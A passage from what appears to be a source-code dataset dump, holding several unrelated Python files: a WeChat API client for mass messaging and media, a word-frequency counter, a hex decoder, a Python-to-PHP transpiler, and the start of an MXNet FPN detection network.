        (SERVER_URL, accessToken), data=encode_send_dict(msgDict))
    def _wrap_result(result):
        return ReturnValue(result.json())
    r._wrap_result = _wrap_result
    return r
@access_token
def send_all(msgType, mediaId, additionalDict={},
        tagId=None, agentId=None, accessToken=None):
    ''' mass-send a message to all followers or to one tag (mass/sendall)
     * tagId None -> send to everyone; otherwise only to that tag
     * agentId is accepted but not used here -- NOTE(review)
     * a successful result (containing media_id) is normalized to
       errcode 0 by the _wrap_result hook
    '''
    msgDict = __form_send_dict(msgType, mediaId, additionalDict)
    if not msgDict: return msgDict
    if tagId is None:
        msgDict['filter'] = {'is_to_all': True, 'tag_id': 0}
    else:
        msgDict['filter'] = {'is_to_all': False, 'tag_id': tagId}
    r = requests.post('%s/cgi-bin/message/mass/sendall?access_token=%s' %
        (SERVER_URL, accessToken), data=encode_send_dict(msgDict))
    def _wrap_result(result):
        result = ReturnValue(result.json())
        if 'media_id' in result: result['errcode'] = 0
        return result
    r._wrap_result = _wrap_result
    return r
@access_token
def preview(msgType, mediaId, additionalDict={},
        toUserId=None, toWxAccount=None, accessToken=None):
    ''' preview a mass message for a single user (mass/preview)
     * requires toUserId (openid) or toWxAccount (wechat account name);
       returns errcode -10003 locally when both are missing
    '''
    msgDict = __form_send_dict(msgType, mediaId, additionalDict)
    if not msgDict: return msgDict
    if (toUserId or toWxAccount) is None:
        return ReturnValue({'errcode': -10003})
    else:
        if toUserId is not None: msgDict['touser'] = toUserId
        if toWxAccount is not None: msgDict['towxname'] = toWxAccount
    r = requests.post('%s/cgi-bin/message/mass/preview?access_token=%s' %
        (SERVER_URL, accessToken), data=encode_send_dict(msgDict))
    def _wrap_result(result):
        return ReturnValue(result.json())
    r._wrap_result = _wrap_result
    return r
@access_token
def form_video_id(mediaId, additionalDict, accessToken=None):
    ''' in theory video needs another method to get media_id for sending

    Re-registers an uploaded video (uploadvideo endpoint) to obtain a
    media id usable for mass sending.
    WARNING: mutates the caller's additionalDict in place (adds the
    'media_id' and 'description' keys).
    '''
    additionalDict['media_id'] = mediaId
    additionalDict['description'] = additionalDict['introduction']
    # requests.packages.urllib3.disable_warnings()
    url = 'https://file.api.weixin.qq.com/cgi-bin/media/uploadvideo' \
        '?access_token=%s' % accessToken
    r = requests.post(url, data=encode_send_dict(additionalDict))
        # verify=False).json()
        # I don't know why this is a fake ssl
    def _wrap_result(result):
        result = ReturnValue(result.json())
        if 'media_id' in result:
            result['errcode'] = 0
        return result
    r._wrap_result = _wrap_result
    return r
def __form_send_dict(msgType, mediaId, additionalDict):
    ''' build the JSON body for a mass-send request for msgType
     * returns ReturnValue(errcode 40004) for an unknown type
     * for VIDEO, first converts mediaId via form_video_id and
       propagates its falsy result on failure
    '''
    if not msgType in (IMAGE, VOICE, VIDEO, TEXT, NEWS, CARD):
        return ReturnValue({'errcode': 40004,})
    elif msgType == VIDEO:
        mediaId = form_video_id(mediaId, additionalDict)['media_id']
        if not mediaId: return mediaId
    return {
        NEWS: {'mpnews':{'media_id': mediaId}, 'msgtype': 'mpnews'},
        TEXT: {'text': {'content': mediaId}, 'msgtype': 'text'},
        VOICE: {'voice': {'media_id': mediaId}, 'msgtype': 'voice'},
        IMAGE: {'image': {'media_id': mediaId}, 'msgtype': 'image'},
        VIDEO: {'mpvideo':{'media_id': mediaId,
            'title': additionalDict.get('title', ''),
            'description': additionalDict.get('introduction', '')},
            'msgtype': 'mpvideo'},
        CARD: {'wxcard': {'card_id': mediaId}, 'msgtype': 'wxcard'},
        }[msgType]
@access_token
def delete(msgId, accessToken=None):
    ''' delete a mass message by its msg_id (mass/delete)

    NOTE(review): posts a raw dict (form-encoded by typical clients)
    while the other calls in this module JSON-encode the body with
    encode_send_dict -- confirm against the project requests wrapper.
    '''
    r = requests.post('%s/cgi-bin/message/mass/delete?access_token=%s' %
        (SERVER_URL, accessToken), data={'msg_id': msgId})
    def _wrap_result(result):
        return ReturnValue(result.json())
    r._wrap_result = _wrap_result
    return r
@access_token
def get(msgId, accessToken=None):
    ''' query the status of a mass message by its msg_id (mass/get)

    NOTE(review): same raw-dict body as delete() above -- confirm the
    wrapper serializes it the way the endpoint expects.
    '''
    r = requests.post('%s/cgi-bin/message/mass/get?access_token=%s' %
        (SERVER_URL, accessToken), data={'msg_id': int(msgId)})
    def _wrap_result(result):
        return ReturnValue(result.json())
    r._wrap_result = _wrap_result
    return r
@access_token
def upload(fileType, fileDir, additionalDict={}, permanent=False, accessToken=None):
    ''' upload a media file as temporary or permanent material
     * fileType: IMAGE/VOICE/VIDEO/THUMB
     * fileDir: path of the file to upload (read as binary)
     * additionalDict keys are normalized (lower-cased, underscores
       dropped, a nested 'description' dict flattened); a permanent
       VIDEO upload requires 'title' and 'description'
     * permanent=False -> media/upload, permanent=True -> material/add_material
     * a media id found anywhere in the response is normalized into
       result['media_id'] with errcode 0
    '''
    if additionalDict: # format additionalDict
        # flatten a nested 'description' dict into the top level
        for key in ('description',):
            if key in additionalDict and isinstance(additionalDict[key], dict):
                for k, v in additionalDict[key].items():
                    if k not in additionalDict:
                        additionalDict[k] = v
        additionalDict = {k.lower().replace('_', ''): v
            for k, v in additionalDict.items()}
        if 'introduction' in additionalDict:
            additionalDict['description'] = additionalDict['introduction']
    if not fileType in (IMAGE, VOICE, VIDEO, THUMB):
        return ReturnValue({'errcode': 40004,})
    elif fileType == VIDEO and permanent and not ('title' in additionalDict
            and 'description' in additionalDict):
        return ReturnValue({'errcode': -10003, 'errmsg':
            'additionalDict for type VIDEO should be: ' +
            "{'Title' : 'title', 'Description' :'des'}"})
    try:
        with open(fileDir, 'rb') as f:
            file_ = f.read()
    except:
        # unreadable / missing file
        return ReturnValue({'errcode': -10004,})
    # synthesize a generic file name keeping only the real extension
    fileName = 'file' + os.path.splitext(fileDir)[1]
    if hasattr(fileName, 'decode'):
        fileName = fileName.decode('utf8', 'replace')
    fileMime = mimetypes.guess_type(fileName)[0] or 'application/octet-stream'
    if permanent:
        url = '%s/cgi-bin/material/add_material?access_token=%s&type=%s'
    else:
        url = '%s/cgi-bin/media/upload?access_token=%s&type=%s'
    files = {'media': (fileName, file_, fileMime), }
    if fileType == VIDEO and permanent:
        # permanent videos additionally need a JSON description part
        files['description'] = (None, encode_send_dict({
            'title': additionalDict['title'],
            'introduction': additionalDict['description'], }
            ), 'application/json')
    r = requests.post(url % (SERVER_URL, accessToken, fileType),
        files=files)
    def _wrap_result(result):
        result = ReturnValue(result.json())
        if 'media_id' in result:
            result['errcode'] = 0
        else:
            # some endpoints return e.g. 'thumb_media_id'; normalize it
            for k in result:
                if 'media_id' in k:
                    result['media_id'] = result[k]
                    result['errcode'] = 0
                    break
        return result
    r._wrap_result = _wrap_result
    return r
@access_token
def download(mediaId, accessToken=None):
    ''' download a temporary media file (media/get)

    The response is streamed.  A JSON (text/plain) response is returned
    as a ReturnValue; binary content is buffered into an io.BytesIO
    under the 'File' key, with FileName / ContentType / ContentLength
    copied from the headers when present.
    '''
    r = requests.get('%s/cgi-bin/media/get?access_token=%s&media_id=%s' %
        (SERVER_URL, accessToken, mediaId), stream=True)
    def _wrap_result(result):
        if 'text/plain' in result.headers['Content-Type']:
            j = result.json()
            if 'down_url' in j or 'news_item' in j:
                # videos/news come back as JSON descriptors, not bytes
                j['errcode'] = 0
            return ReturnValue(j)
        else:
            tempStorage = io.BytesIO()
            for block in result.iter_content(1024):
                tempStorage.write(block)
            basicDict = {'File': tempStorage, 'errcode': 0}
            if 'Content-disposition' in result.headers:
                match = re.search('filename="(.*?)"', result.headers['Content-disposition'])
                if match:
                    basicDict['FileName'] = match.group(1)
            if 'Content-Type' in result.headers:
                basicDict['ContentType'] = result.headers['Content-Type']
            if 'Content-Length' in result.headers:
                basicDict['ContentLength'] = result.headers['Content-Length']
            return ReturnValue(basicDict)
    r._wrap_result = _wrap_result
    return r
@access_token
def get_material(mediaId, accessToken=None):
    ''' fetch a permanent material by media id (material/get_material)

    Same response handling as download(): JSON descriptors become a
    ReturnValue, binary content is buffered into io.BytesIO ('File').
    '''
    data = {'media_id': mediaId}
    data = encode_send_dict(data)
    if data is None: return ReturnValue({'errcode': -10001})
    r = requests.post('%s/cgi-bin/material/get_material?access_token=%s' %
        (SERVER_URL, accessToken), data=data, stream=True)
    def _wrap_result(result):
        if 'text/plain' in result.headers['Content-Type']:
            j = result.json()
            if 'down_url' in j or 'news_item' in j:
                j['errcode'] = 0
            return ReturnValue(j)
        else:
            tempStorage = io.BytesIO()
            for block in result.iter_content(1024):
                tempStorage.write(block)
            basicDict = {'File': tempStorage, 'errcode': 0}
            if 'Content-disposition' in result.headers:
                match = re.search('filename="(.*?)"', result.headers['Content-disposition'])
                if match:
                    basicDict['FileName'] = match.group(1)
            if 'Content-Type' in result.headers:
                basicDict['ContentType'] = result.headers['Content-Type']
            if 'Content-Length' in result.headers:
                basicDict['ContentLength'] = result.headers['Content-Length']
            return ReturnValue(basicDict)
    r._wrap_result = _wrap_result
    return r
@access_token
def delete_material(mediaId, accessToken=None):
    ''' delete a permanent material by its media id (material/del_material)

    Bug fix: the del_material endpoint expects a JSON body keyed
    'media_id'; the previous code form-posted {'msg_id': mediaId},
    which the endpoint does not understand.  The body is now built
    with encode_send_dict, consistent with the rest of this module.
    '''
    data = encode_send_dict({'media_id': mediaId})
    if data is None: return ReturnValue({'errcode': -10001})
    r = requests.post('%s/cgi-bin/material/del_material?access_token=%s' %
        (SERVER_URL, accessToken), data=data)
    def _wrap_result(result):
        return ReturnValue(result.json())
    r._wrap_result = _wrap_result
    return r
@access_token
def get_material_count(accessToken=None):
    ''' fetch the counts of permanent materials (material/get_materialcount)

    A response containing voice_count is treated as success (errcode 0).
    '''
    r = requests.get('%s/cgi-bin/material/get_materialcount?access_token=%s'
        % (SERVER_URL, accessToken))
    def _wrap_result(result):
        result = ReturnValue(result.json())
        if 'voice_count' in result:
            result['errcode'] = 0
        return result
    r._wrap_result = _wrap_result
    return r
@access_token
def batchget_material(fileType, offset=0, count=20, accessToken=None):
    ''' page through permanent materials (material/batchget_material)
     * fileType: IMAGE/VOICE/VIDEO/THUMB
     * count is capped at 20 (the endpoint maximum)
       NOTE(review): no lower bound is enforced (endpoint expects 1-20)
    '''
    if not fileType in (IMAGE, VOICE, VIDEO, THUMB):
        return ReturnValue({'errcode': 40004,})
    if 20 < count: count = 20
    data = {'type': fileType,
        'offset': offset,
        'count': count, }
    data = encode_send_dict(data)
    if data is None: return ReturnValue({'errcode': -10001})
    r = requests.post('%s/cgi-bin/material/batchget_material?access_token=%s'
        % (SERVER_URL, accessToken), data=data)
    def _wrap_result(result):
        result = ReturnValue(result.json())
        if 'total_count' in result: result['errcode'] = 0
        return result
    r._wrap_result = _wrap_result
    return r
@access_token
def create_news(newsDict, permanent=False, accessToken=None):
    ''' upload a formed news item, temporary or permanent
     * permanent=False -> media/uploadnews, permanent=True -> material/add_news
     * success (media_id in response) is normalized to errcode 0
    '''
    if permanent:
        url = '%s/cgi-bin/material/add_news?access_token=%s'
    else:
        url = '%s/cgi-bin/media/uploadnews?access_token=%s'
    r = requests.post(url % (SERVER_URL, accessToken),
        data=encode_send_dict(newsDict))
    def _wrap_result(result):
        result = ReturnValue(result.json())
        if 'media_id' in result: result['errcode'] = 0
        return result
    r._wrap_result = _wrap_result
    return r
@access_token
def update_news(mediaId, newsDict, index=0, accessToken=None):
    ''' update one article of a permanent news item (material/update_news)
     * mediaId: the permanent news item's media id
     * index: position of the article to replace within the item
    '''
    data = {
        'media_id': mediaId,
        'index': index,
        'articles': newsDict, }
    data = encode_send_dict(data)
    if data is None: return ReturnValue({'errcode': -10001})
    r = requests.post('%s/cgi-bin/material/update_news?access_token=%s' %
        (SERVER_URL, accessToken), data=data)
    def _wrap_result(result):
        return ReturnValue(result.json())
    r._wrap_result = _wrap_result
    return r
@access_token
def get_image_url(openedFile, accessToken=None):
    ''' upload an image used inside news and get its url (media/uploadimg)
     * openedFile: a file object opened in binary mode
     * success (url in response) is normalized to errcode 0
    '''
    r = requests.post('%s/cgi-bin/media/uploadimg?access_token=%s' %
        (SERVER_URL, accessToken), files={'file': openedFile})
    def _wrap_result(result):
        result = ReturnValue(result.json())
        if 'url' in result: result['errcode'] = 0
        return result
    r._wrap_result = _wrap_result
    return r
@access_token
def get_autoreply(accessToken=None):
    ''' fetch the current auto-reply configuration
    (get_current_autoreply_info); a response containing
    is_autoreply_open is treated as success (errcode 0).
    '''
    r = requests.post('%s/cgi-bin/get_current_autoreply_info?access_token=%s' %
        (SERVER_URL, accessToken))
    def _wrap_result(result):
        result = ReturnValue(result.json())
        if 'is_autoreply_open' in result:
            result['errcode'] = 0
        return result
    r._wrap_result = _wrap_result
    return r
| [
"i7meavnktqegm1b@qq.com"
] | i7meavnktqegm1b@qq.com |
397af60380ffa4194bd09f7aacf8e1e1681c1190 | 34346885d1f3de258f5f38188f9abe82845a0776 | /countWords.py | d6f72a5de2d0b09d1ed7837479457625929364dd | [] | no_license | cscamman/CS-203-Final-Project | 5c031862d259685653187029e1bd108ec5cb69b1 | 338d4451cf5c5f89359da2bbcebf1858e7bf4b31 | refs/heads/master | 2021-01-01T06:03:04.954698 | 2017-07-15T21:18:24 | 2017-07-15T21:18:24 | 97,342,824 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,410 | py | """
Count Word Frequency
CSCI 203 project
Spring 2017
Student name(s): Corey Scamman
Justin LaCapra
"""
import operator
from collections import OrderedDict
from operator import itemgetter
def plotData(sorted_dic, string):
    """Show a horizontal bar chart of the 20 most frequent words.

    sorted_dic: mapping of word -> count, already ordered by descending
    count (an OrderedDict built by countWords).
    string: text for the chart title (the analyzed file's name).
    """
    import matplotlib.pyplot as plt; plt.rcdefaults()
    import numpy as np
    # Take the top 20 entries (the dict is already sorted by count).
    words = list(sorted_dic.keys())[0:20]
    counts = list(sorted_dic.values())[0:20]
    y_pos = np.arange(len(words))
    plt.barh(y_pos, counts, align='center', alpha=.5)
    plt.yticks(y_pos, words)
    # Bug fix: on a horizontal bar chart the counts run along the x axis,
    # so the frequency label belongs on xlabel (it was on ylabel).
    plt.xlabel('Frequency')
    plt.title('Top 20 Used Words for ' + string)
    plt.show()
def countWords(filename):
    """Analyze a text file: print its unique-word count and the 20 most
    frequent words, then plot them with plotData.

    Words are stripped of surrounding punctuation and lowercased, then
    filtered against the stop words in 'stopwords.txt'; tokens of length
    <= 2 are dropped.  Fixes over the original: file handles are closed,
    stop-word lookup is O(1) via a set, the dead always-true membership
    test is gone, the header no longer says 'Top 10' while printing 20,
    and fewer than 20 distinct words no longer raises IndexError.
    """
    # Read the document and the stop-word list, closing both handles.
    with open(filename, 'r') as f:
        words = f.read().split()
    with open('stopwords.txt', 'r') as f:
        stopwords = set(f.read().split())  # set: O(1) membership tests
    # Normalize: strip surrounding punctuation and lowercase.
    words = [w.strip('-,.:;!?').lower() for w in words]
    # Drop stop words and very short tokens.
    kept = [w for w in words if w not in stopwords and len(w) > 2]
    # Tally the frequency of each unique word.
    dic = {}
    for w in kept:
        dic[w] = dic.get(w, 0) + 1
    sorted_dic = sorted(dic.items(), key=lambda x: x[1], reverse=True)
    print('Running analysis for ' + filename)
    print('')
    print('Unique words count: ' + str(len(dic)))
    print('Top 20 most used words and their count')
    for rank, entry in enumerate(sorted_dic[:20], start=1):
        print(rank, entry)
    plotData(OrderedDict(sorted_dic), filename)
# Script entry point: prompt for a file name and analyze it.
file = (input('Please enter the name of the text file you would like to analyze\n'))
countWords(file)
| [
"noreply@github.com"
] | noreply@github.com |
ff7186b3ff427a7fdc001b27a0f1c83b3e5daf0a | 9d904e52e49df52739c3287454469d5831b01ab0 | /week2/convert_hex/main.py | ee8babace7a2e57761721c749118e7aa8bfec787 | [] | no_license | joeyabouharb/term2-challenges | dab54da02e9182d5633ec275667e07792934445b | 6b10296dcb187024df75d7620b01a1d848313c95 | refs/heads/master | 2023-01-25T05:10:09.106671 | 2019-10-22T23:56:53 | 2019-10-22T23:56:53 | 203,889,286 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 374 | py | #! /usr/bin/env python3
"""
Joseph Abouharb
decodes a secret message from hex value to text string
MIT
"""
from codecs import decode
x = 5
def main(hex_data):
print(
decode(hex_data, "hex").decode('utf-8')
)
if __name__ == '__main__':
main(
"49276d20616c7265616479205472616365"
)
print(x)
def test():
def fdfsdfsd():
pass | [
"joey.abouharb@gmail.com"
] | joey.abouharb@gmail.com |
419c8a91a20a69ff1f0924b178d71876b2f3d74b | 255e19ddc1bcde0d3d4fe70e01cec9bb724979c9 | /all-gists/1035975/snippet.py | 5f3993a8803fe9637f988459e7009fb87ae47a03 | [
"MIT"
] | permissive | gistable/gistable | 26c1e909928ec463026811f69b61619b62f14721 | 665d39a2bd82543d5196555f0801ef8fd4a3ee48 | refs/heads/master | 2023-02-17T21:33:55.558398 | 2023-02-11T18:20:10 | 2023-02-11T18:20:10 | 119,861,038 | 76 | 19 | null | 2020-07-26T03:14:55 | 2018-02-01T16:19:24 | Python | UTF-8 | Python | false | false | 13,415 | py | import ast
from cStringIO import StringIO
import sys
INFSTR = '1e308'
def interleave(inter, f, seq):
seq = iter(seq)
try:
f(next(seq))
except StopIteration:
pass
else:
for x in seq:
inter()
f(x)
class PythonToPhp:
def __init__(self, source, indent = 0):
tree = ast.parse(source)
self.code = StringIO()
self.tabstop = 2
self._indent = indent
self.dispatch(tree)
def get_code(self):
return self.code.getvalue()
def fill(self, text = ''):
self.code.write('\n%s%s' % (' ' * self.tabstop * self._indent, text))
def write(self, text):
self.code.write(text)
def enter(self):
self.code.write(' {')
self._indent += 1
def leave(self):
self._indent -= 1
self.fill('}')
def error(self, msg):
print msg
sys.exit()
def dispatch(self, tree):
if isinstance(tree, list):
for t in tree:
self.dispatch(t)
return
meth = getattr(self, '_%s' % tree.__class__.__name__)
return meth(tree)
########## Transform Methods ##########
def _Module(self, tree):
for stmt in tree.body:
self.dispatch(stmt)
### Statement ###
def _Expr(self, tree):
self.fill()
self.dispatch(tree.value)
self.write(';')
def _Import(self, t):
self.error('import not supported')
def _ImportFrom(self, t):
self.error('import not supported')
def _Assign(self, t):
self.fill()
for target in t.targets:
if isinstance(target, ast.Tuple):
self._lvalue_tuple(target)
else:
self.dispatch(target)
self.write(' = ')
self.dispatch(t.value)
self.write(';')
def _AugAssign(self, t):
self.fill()
self.dispatch(t.target)
name = t.op.__class__.__name__
if name == 'Pow':
self.write(' = pow(')
self.dispatch(t.target)
self.write(', ')
self.dispatch(t.value)
self.write(');')
elif name == 'FloorDiv':
self.write(' = floor(')
self.dispatch(t.target)
self.write(' / ')
self.dispatch(t.value)
self.write(');')
else:
self.write(' %s= ' % self.binop[t.op.__class__.__name__])
self.dispatch(t.value)
self.write(';')
def _Return(self, t):
self.fill('return')
if t.value:
self.write(' ')
self.dispatch(t.value)
self.write(';')
def _Pass(self, t):
self.fill(';')
def _Break(self, t):
self.fill('break;')
def _Continue(self, t):
self.fill('continue;')
def _Delete(self, t):
for target in t.targets:
self.fill('unset(')
self.dispatch(target)
self.write(');')
def _Assert(self, t):
self.fill('assert(')
self.dispatch(t.test)
self.write(');')
def _Exec(self, t):
self.fill('eval(')
self.dispatch(t.body)
self.write(');')
def _Print(self, t):
self.fill('echo ')
sep = ''
for e in t.values:
self.write(sep)
self.dispatch(e)
sep = ', '
if t.nl:
self.write(sep)
self.write("'<br />'")
self.write(';')
def _Global(self, t):
self.fill('global ')
interleave(lambda: self.write(', '), self.write, t.names)
self.write(';')
def _Yield(self, t):
self.error('yield not supported')
def _Raise(self, t):
self.error('Exceptions not supported')
def _TryExcept(self, t):
self.error('Exceptions not supported')
def _TryFinally(self, t):
self.error('Exceptions not supported')
def _ExceptHandler(self, t):
self.error('Exceptions not supported')
def _ClassDef(self, t):
self.error('Class not supported')
def _FunctionDef(self, t):
self.fill('function ' + t.name + '(')
self.dispatch(t.args)
self.write(')')
self.enter()
self.dispatch(t.body)
self.leave()
def _For(self, t):
self.fill('foreach (')
self.dispatch(t.iter)
self.write(' as ')
self.dispatch(t.target)
self.write(')')
self.enter()
self.dispatch(t.body)
self.leave()
if t.orelse:
self.error('else clause for for statement not supported')
def _If(self, t):
self.fill("if (")
self.dispatch(t.test)
self.write(')')
self.enter()
self.dispatch(t.body)
self.leave()
# collapse nested ifs into equivalent elifs.
while (t.orelse and len(t.orelse) == 1 and
isinstance(t.orelse[0], ast.If)):
t = t.orelse[0]
self.fill("elseif (")
self.dispatch(t.test)
self.write(')')
self.enter()
self.dispatch(t.body)
self.leave()
# final else
if t.orelse:
self.fill("else")
self.enter()
self.dispatch(t.orelse)
self.leave()
def _While(self, t):
self.fill("while (")
self.dispatch(t.test)
self.write(')')
self.enter()
self.dispatch(t.body)
self.leave()
if t.orelse:
self.error('else clause for while statement not supported')
def _With(self, t):
self.error('with statement not supported')
### Expression ###
def _Str(self, t):
self.write(repr(t.s))
def _Name(self, t):
if t.id == 'True':
self.write('true')
elif t.id == 'False':
self.write('false')
elif t.id == 'None':
self.write('null')
else:
self.write('$%s' % t.id)
def _Repr(self, t):
self.write('var_export(')
self.dispatch(t.value)
self.write(", true)")
def _Num(self, t):
repr_n = repr(t.n)
if repr_n.startswith('-'):
self.write('(')
self.write(repr_n.replace('inf', INFSTR))
if repr_n.startswith('-'):
self.write(')')
def _List(self, t):
self.write('array(')
interleave(lambda: self.write(", "), self.dispatch, t.elts)
self.write(')')
def _ListComp(self, t):
if len(t.generators) > 1:
self.error('multiple generators in comprehension not supported')
generator = t.generators.pop()
self._comprehension(generator, 'left')
self.dispatch(t.elt)
self._comprehension(generator, 'right')
def _comprehension(self, t, part = 'left'):
if part == 'left':
if t.ifs:
self.write('array_filter(array_map(function(')
else:
self.write('array_map(function(')
self.dispatch(t.target)
self.write(') { return ')
elif part == 'right':
self.write('; }, ')
self.dispatch(t.iter)
if t.ifs:
self.write('), function(')
self.dispatch(t.target)
self.write(') { return ')
for if_clause in t.ifs:
self.dispatch(if_clause)
self.write('; })')
else:
self.write(')')
def _GeneratorExp(self, t):
if len(t.generators) > 1:
self.error('multiple generators in comprehension not supported')
generator = t.generators.pop()
self._comprehension(generator, 'left')
self.dispatch(t.elt)
self._comprehension(generator, 'right')
def _SetComp(self, t):
if len(t.generators) > 1:
self.error('multiple generators in comprehension not supported')
self.write('array_unique(')
generator = t.generators.pop()
self._comprehension(generator, 'left')
self.dispatch(t.elt)
self._comprehension(generator, 'right')
self.write(')')
def _DictComp(self, t):
self.error('dict comprehension not supported')
def _IfExp(self, t):
self.write("((")
self.dispatch(t.test)
self.write(') ? (')
self.dispatch(t.body)
self.write(') : (')
self.dispatch(t.orelse)
self.write('))')
def _Set(self, t):
assert(t.elts) # should be at least one element
self.write('array_unique(array(')
interleave(lambda: self.write(", "), self.dispatch, t.elts)
self.write('))')
def _Dict(self, t):
self.write('array(')
def write_pair(pair):
k, v = pair
self.dispatch(k)
self.write(' => ')
self.dispatch(v)
interleave(lambda: self.write(', '), write_pair, zip(t.keys, t.values))
self.write(')')
def _Tuple(self, t):
self.write('array(')
interleave(lambda: self.write(", "), self.dispatch, t.elts)
self.write(')')
def _lvalue_tuple(self, t):
self.write('list(')
interleave(lambda: self.write(", "), self.dispatch, t.elts)
self.write(')')
unop = {"Invert":"~", "Not": "!", "UAdd":"+", "USub":"-"}
def _UnaryOp(self, t):
self.write("(")
self.write(self.unop[t.op.__class__.__name__])
self.write(" ")
if isinstance(t.op, ast.USub) and isinstance(t.operand, ast.Num):
self.write("(")
self.dispatch(t.operand)
self.write(")")
else:
self.dispatch(t.operand)
self.write(")")
binop = {
"Add":"+",
"Sub":"-",
"Mult":"*",
"Div":"/",
"Mod":"%",
"LShift":"<<",
"RShift":">>",
"BitOr":"|",
"BitXor":"^",
"BitAnd":"&",
}
def _BinOp(self, t):
name = t.op.__class__.__name__
if name == 'Pow':
self.write("(pow(")
self.dispatch(t.left)
self.write(', ')
self.dispatch(t.right)
self.write('))')
elif name == 'FloorDiv':
self.write('(floor(')
self.dispatch(t.left)
self.write(' / ')
self.dispatch(t.right)
self.write('))')
elif name == 'Mod' and isinstance(t.left, ast.Str):
self.write('sprintf(')
self.dispatch(t.left)
self.write(', ')
if isinstance(t.right, ast.Str):
self.dispatch(t.right)
elif isinstance(t.right, ast.Tuple):
interleave(lambda: self.write(", "), self.dispatch, t.right.elts)
else:
self.error('impossible string substript error')
self.write(')')
else:
self.write("(")
self.dispatch(t.left)
self.write(" " + self.binop[name] + " ")
self.dispatch(t.right)
self.write(")")
cmpops = {
"Eq":"==",
"NotEq":"!=",
"Lt":"<",
"LtE":"<=",
"Gt":">",
"GtE":">=",
"Is":"===",
"IsNot":"!==",
}
def _Compare(self, t):
name = t.ops[0].__class__.__name__
self.write("(")
if name == 'In':
comparator = t.comparators.pop()
self.write('in_array(')
self.dispatch(t.left)
self.write(', ')
self.dispatch(comparator)
self.write(') || array_key_exists(')
self.dispatch(t.left)
self.write(', ')
self.dispatch(comparator)
self.write(')')
elif name == 'NotIn':
comparator = t.comparators.pop()
self.write('!in_array(')
self.dispatch(t.left)
self.write(', ')
self.dispatch(comparator)
self.write(') && !array_key_exists(')
self.dispatch(t.left)
self.write(', ')
self.dispatch(comparator)
self.write(')')
else:
self.dispatch(t.left)
for o, e in zip(t.ops, t.comparators):
self.write(" " + self.cmpops[o.__class__.__name__] + " ")
self.dispatch(e)
self.write(")")
boolops = {ast.And: '&&', ast.Or: '||'}
def _BoolOp(self, t):
self.write("(")
s = " %s " % self.boolops[t.op.__class__]
interleave(lambda: self.write(s), self.dispatch, t.values)
self.write(")")
def _Attribute(self,t):
self.dispatch(t.value)
self.write("->")
self.write(t.attr)
def _func_name(self, t):
self.write('%s' % t.id)
def _Call(self, t):
self._func_name(t.func)
self.write("(")
comma = False
for e in t.args:
if comma: self.write(", ")
else: comma = True
self.dispatch(e)
for e in t.keywords:
if comma: self.write(", ")
else: comma = True
self.dispatch(e)
if t.starargs:
self.error('function vararg not supported')
if t.kwargs:
self.error('function kwarg not supported')
self.write(")")
def _Subscript(self, t):
if isinstance(t.slice, ast.Index):
#self.dispatch(t.value)
#self.write("[")
#self.dispatch(t.slice)
#self.write("]")
self.write('pyphp_subscript(')
self.dispatch(t.value)
self.write(', ')
self.dispatch(t.slice)
self.write(')')
elif isinstance(t.slice, ast.Slice):
self.write('array_slice(')
self.dispatch(t.value)
self.write(', ')
self.dispatch(t.slice)
self.write(')')
def _Ellipsis(self, t):
self.error('ellipsis not supported')
def _Index(self, t):
self.dispatch(t.value)
def _Slice(self, t):
if t.lower:
self.dispatch(t.lower)
else:
self.write('0')
if t.upper:
self.write(", ")
self.write('(')
self.dispatch(t.upper)
self.write(' - ')
if t.lower:
self.dispatch(t.lower)
else:
self.write('0')
self.write(')')
if t.step:
self.error('slice step not supported')
def _ExtSlice(self, t):
self.error('extslice not supported')
#interleave(lambda: self.write(', '), self.dispatch, t.dims)
### Others ###
def _arguments(self, t):
first = True
defaults = [None] * (len(t.args) - len(t.defaults)) + t.defaults
for a,d in zip(t.args, defaults):
if first: first = False
else: self.write(", ")
self.dispatch(a),
if d:
self.write(" = ")
self.dispatch(d)
if t.vararg:
self.error('function vararg not supported')
if t.kwarg:
self.error('function kwarg not supported')
def _keyword(self, t):
self.write('$%s' % t.arg)
self.write(" = ")
self.dispatch(t.value)
def _Lambda(self, t):
self.write("(")
self.write("function(")
self.dispatch(t.args)
self.write(") {")
self.dispatch(t.body)
self.write("})")
def _alias(self, t):
self.error('alias not supported')
| [
"gistshub@gmail.com"
] | gistshub@gmail.com |
ce9503d82749c331998242ffc827e8f6aa81c3bb | 1a8583a07b710a2b8d3344bddb3aa5dd2abc9547 | /fpn/symbols/resnet_v1_101_fpn_rcnn_sod_l0_focal_v4.py | d103e0f2366990e847198ebfde760930a3092875 | [
"MIT"
] | permissive | qilei123/sod_v1_demo | 9fec1377609acaa2c04ced0008208ecabce3f53e | a38f76e5a3af13f8f16d32aa40369f1a4f4fd839 | refs/heads/master | 2020-05-04T18:27:50.655652 | 2019-07-02T01:39:58 | 2019-07-02T01:39:58 | 179,354,251 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92,739 | py | # --------------------------------------------------------
# Deformable Convolutional Networks
# Copyright (c) 2017 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Haozhi Qi
# --------------------------------------------------------
import cPickle
import mxnet as mx
from utils.symbol import Symbol
from operator_py.pyramid_proposal import *
from operator_py.proposal_target import *
from operator_py.fpn_roi_pooling import *
from operator_py.box_annotator_ohem import *
from operator_py.focal_loss_OptimizedVersion import *
class resnet_v1_101_fpn_rcnn_sod_l0_focal_v4(Symbol):
def __init__(self):
"""
Use __init__ to define parameter network needs
"""
self.shared_param_list = ['rpn_conv', 'rpn_cls_score', 'rpn_bbox_pred']
self.shared_param_dict = {}
for name in self.shared_param_list:
self.shared_param_dict[name + '_weight'] = mx.sym.Variable(name + '_weight')
self.shared_param_dict[name + '_bias'] = mx.sym.Variable(name + '_bias')
def get_resnet_backbone(self, data, with_dilated=False, with_dconv=False, with_dpyramid=False, eps=1e-5):
conv1 = mx.symbol.Convolution(name='conv1', data=data, num_filter=64, pad=(3, 3), kernel=(7, 7), stride=(2, 2), no_bias=True)
bn_conv1 = mx.symbol.BatchNorm(name='bn_conv1', data=conv1, use_global_stats=True, fix_gamma=False, eps=eps)
scale_conv1 = bn_conv1
conv1_relu = mx.symbol.Activation(name='conv1_relu', data=scale_conv1, act_type='relu')
pool1 = mx.symbol.Pooling(name='pool1', data=conv1_relu, pooling_convention='full', pad=(0, 0), kernel=(3, 3), stride=(2, 2), pool_type='max')
